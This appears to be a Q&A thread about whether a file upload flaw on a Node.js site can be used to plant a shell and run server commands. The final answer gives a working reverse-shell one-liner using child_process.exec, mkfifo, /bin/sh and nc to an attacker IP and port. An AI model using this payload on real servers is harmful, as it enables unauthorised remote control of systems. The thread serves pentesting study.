# NodeJS remote file upload vulnerability

Tags: node.js, security, websecurity

i'm trying to learn NodeJS pentesting process i have a found a remote file upload vulnerability in a Nodejs website ,can i upload a remote shell in NodeJS , like we do in PHP or ASPX and execute command ?  can i upload a NodeJS shell.js and execute unix command in the server from this shell ?

Comment: You can upload shell.js script but you can not execute it remotely unless you have the SSH password and username of target

Answer (score 2):

Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server *and* execute it, then yes, you can run shell commands using [child_process.exec](https://nodejs.org/docs/v8.1.4/api/child_process.html#child_process_child_process_exec_command_options_callback) (see [here](https://stackoverflow.com/questions/20643470/execute-a-command-line-binary-with-node-js#answer-20643568) for a similar question/answer).

Answer (score 0):

It's possible only if you can "EXECUTE" the file.

But if you can "execute" JavaScript code you could create a reverse shell using this:

```
(function () {
    require("child_process")
    .exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f')
})()]
```

Otherwise if you can't execute the file then you only will see the content of the file:

https://myvulnerablewebsite.com/hack.js